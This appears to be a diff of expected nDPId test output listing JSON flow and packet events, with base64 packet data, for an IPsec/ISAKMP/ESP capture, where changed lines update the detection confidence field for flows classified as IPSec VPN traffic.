00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsj4QAAPcRRsBt7bvCwKgCZBGUopIA2HVRAAAAAA0wAwLs3PExCE8kgQKA2sMuICMgAAAAAQAAAMwkAACwquU718u5VhZfSwZUPwqxrsfVvbXtg9ycFAzdkanxQ4ZdmhxID0tgHCAM8ZrGCNxZG+FMVTvTdhGn6q1TuemOvZE4\/LhT+0r5el9vMdASwlSSx0gJzmvmxrcB0dt7mxOTFIpkAfSwW5dBG6ONvXmn\/eLVkHomLxSYvgisw8c17eZNpBSLv1WfsJICYvDpJiGKxg9eRd1+NHW\/k+OQLS1krJhN0Ro1DTGeveCqAg=="} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMAv5AAP0RjabAqAJkbe27wqKSEZQAeEmQAAAAAA0wAwLs3PExCE8kgQKA2sMuICMIAAAAAgAAAGwwAABQhVi3P8yzTfHmuI+q40jjfvXXeLkn\/P4\/Guol\/mo4SQDG6v9jAVAtKweO\/8NZOJnwHxQSgEjTe1ProSx0L5Q8GD20Y8a7kPdCB4+4WA=="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMyhBAAD8RgdPAqAJkbe27wzikEZQDOBN4AAAAAIetJ3eFzqOBsYTP+wFs9UMuICMIAAAAAQAAAywjAAMQDxOwAsdF5DcmouqZ3qIIPX2dL17Sxwthytf35vX8VepVzCyasejxBabYcg1eZCOCXo7wibJ+5Ox19FZZ6WA8o\/FtirT1unp5\/KbKnXJj\/jdAwsC5Cmk+0nKvvIVGEa9qjOK1riRUBOLg3AgiPD1b0MEFCXVy4tktzPSYyIT8FCvxETxIN6UD6Cy0KYjRB1oZX0kS66ppXYIIhSpZkY1xn5UMgaZMfKIHRiIv7woIJ2+2jQ73aaZIyotOsyvuBpCcaZZtBWDFsbxm1+cgUkifeDRJjisc\/P6P1jHCx3Z8vmdJyRKNeCtsnStiUyoS1VGy5753yy5XlcqyN1B55mmx4GRa\/HHN4mxvBeQitpdQLQOqc6vSA0zhTHgBD7SqScWn+dc6+bWmJ+j4cfy7mqr12cjpoTIadqdkZ7jJFgUvViPa2cgUSiM3DiCGDwLwi5JltLqmhOCF0oMk1nr3YuvM6ljvscdIRoBP4lidxy72BTx2UZlMkO+gzCPcHOW65ARx8Q3rhw639NUizpwmTbUkhokOYA3JgJkVwbeWLn3lqwv6Ss6NJIdQEqhXHRExkAJxbLRtBylO+3j+muHjVwbAq75LBJzf\/i1UAstHQcg9qDTT\/ZGnKR7Ty8pWWhioaHffJyRRi+h7sK9zbkiOiBD2zt27yYltBBHPMaDytJghkfxYshxtNEjP7DDk9JsIuFz31CRxvyTYCQUiXHMZzbvXZcN82ro0WR0fgq1043ibbzHUg7FzuXDctY\/SwA7NZ6qxwtvg+\/psiPeUB1hzEtF8wdnYUlNalOdh0Yc76GQbrhWCoStkQi0Ydfl4xegAN22+a1lTlBg\/JUSrqLehByai4h1B4NwNJGynTPFzUMsATeVNbTFpe3jxVZt7P0vWrNnVT5BSaGfJDb7gcqxWmVTROLUQN0E2hcEUz38Y8e\/5eatZL+yHIrAcKK3EtVCpKFtumiow9ZZ6GvGizVBzhM2NnzoVEntamjmvJQIYNFqpe\/oZhY0wNJUxF\/\/qeQzJrYJ1oz4Qh6UIgPZ5y5Hy"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsxPAAAPcREVNt7bvDwKgCZBGUOKQA2JZNAAAAAIetJ3eFzqOBsYTP+wFs9UMuICMgAAAAAQAAAMwkAACwMr0OAkWijHaDvVGx2cRd0BpnFxS9yWmk6USjwA1\/uw1HQpBxwIy+M+R8Al6F3b36KkUGMX1VKR6k1QkDbK7wUf6D75B3WW4+ESdgDyReOoS2h1kZn2iRJm0Fo9teEurdyI4sprk4gzmd0gpIbHjeDxKa9imZvZ3qtI3GQJ3qHIAJc5ObsHzpll\/5YtnVtIGJqMEfyVkFO5ycBlEymK2bZ\/IKDHFsKs137Rdruw=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMyldAAD8RhEzAqAJkbe27wzikEZQAeNzZAAAAAIetJ3eFzqOBsYTP+wFs9UMuICMIAAAAAgAAAGwwAABQNF9O8PSFPDdTA7ru1rW4e\/OgLqcWU5nzNhiXwaf5BsfwxiuanodxWmR58JZG78eli1reIYIhuG8qOBQ5mrxafVbmCl4feN4SYilPrw=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAFsAvlAAP0RjMvAqAJkbe27wqKSAfQBWN5x2W94XiRTTxcAAAAAAAAAACEgIggAAAAAAAABUCIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAACx++sTkIAWw+R7uHiEwXIocXunucKDvQ5WSJ7oK89SHVsCi3vgdk4CV3hQZ6lLDvwsftNwzYqzFzZyIXPkR15xXGy4j\/8RE04AqF3L6rnl4kSFK8ao0Ashh\/3kXMb9tCb5RitTqZrxo1fBcVb7A7oPwAwOnJNHigc5D1k2OVhjzSkAABgEvd5QXYxmcM3GjeZtcZGvHLA3lSkAABwAAEAEq1KQqOfFPfZ6rmfMr0R1F4jORZkAAAAcAABABfY+rBnlsnnwA5bb6lPTmpcNo5hy"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":947,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":947,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQjVEAAPcRSY9t7bvCwKgCZAH0opIAPIoL2W94XiRTTxcAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFWSdZrX4ccCgpHyIoYQw=="} 00926{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":402,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":402,"pkt_l4_len":368,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAGEAvpAAP0RjLLAqAJkbe27wqKSAfQBcOGu2W94XiRTTxcAAAAAAAAAACkgIggAAAAAAAABaCEAABgAAEAGAAFWSdZrX4ccCgpHyIoYQyIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAACx++sTkIAWw+R7uHiEwXIocXunucKDvQ5WSJ7oK89SHVsCi3vgdk4CV3hQZ6lLDvwsftNwzYqzFzZyIXPkR15xXGy4j\/8RE04AqF3L6rnl4kSFK8ao0Ashh\/3kXMb9tCb5RitTqZrxo1fBcVb7A7oPwAwOnJNHigc5D1k2OVhjzSkAABgEvd5QXYxmcM3GjeZtcZGvHLA3lSkAABwAAEAEq1KQqOfFPfZ6rmfMr0R1F4jORZkAAAAcAABABfY+rBnlsnnwA5bb6lPTmpcNo5hy"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAMkyf9AAD8RggzAqAJkbe27wykEAfQDED50h60nd4XOo4EAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAEnKegIkLOmW4KZNcOCo7ZOC4licZ2A51HwGaEIiqoXRPN6FcRoNRdAJs+VA4OoEhdOX8Fx4+MU+pUH2RMi10WP9fW5dlYg6Cr9HTfi+4X5mNAA6iu7R0SUnBzU7WFhgJmUeZ23\/+YRhQU1yMpmQB5bWydw9ZfvTkPXAog0gKlZ1KQAAJIVS0Rg+btu6BkuEgsgaurW3aJ4eaYYGQ6VjkOvvz6QMKQAAHAAAQASo5HDOkRKoIfuPc\/+LezYZYFoAhAAAABwAAEAFi9H7SlG8iBMVMxjPqyusPgxIUYI="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQw\/QAAPcREutt7bvDwKgCZAH0KQQAPDt0h60nd4XOo4EAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFWSjMix2hDw5Uoh9iWqg=="} 01514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8ygVAAD8Rge7AqAJkbe27wykEAfQDKIzIh60nd4XOo4EAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFWSjMix2hDw5Uoh9iWqiIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAEnKegIkLOmW4KZNcOCo7ZOC4licZ2A51HwGaEIiqoXRPN6FcRoNRdAJs+VA4OoEhdOX8Fx4+MU+pUH2RMi10WP9fW5dlYg6Cr9HTfi+4X5mNAA6iu7R0SUnBzU7WFhgJmUeZ23\/+YRhQU1yMpmQB5bWydw9ZfvTkPXAog0gKlZ1KQAAJIVS0Rg+btu6BkuEgsgaurW3aJ4eaYYGQ6VjkOvvz6QMKQAAHAAAQASo5HDOkRKoIfuPc\/+LezYZYFoAhAAAABwAAEAFi9H7SlG8iBMVMxjPqyusPgxIUYI="} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":56312,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":291,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":139412,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":33856,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":8164,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":32620,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763512920,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":11496,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 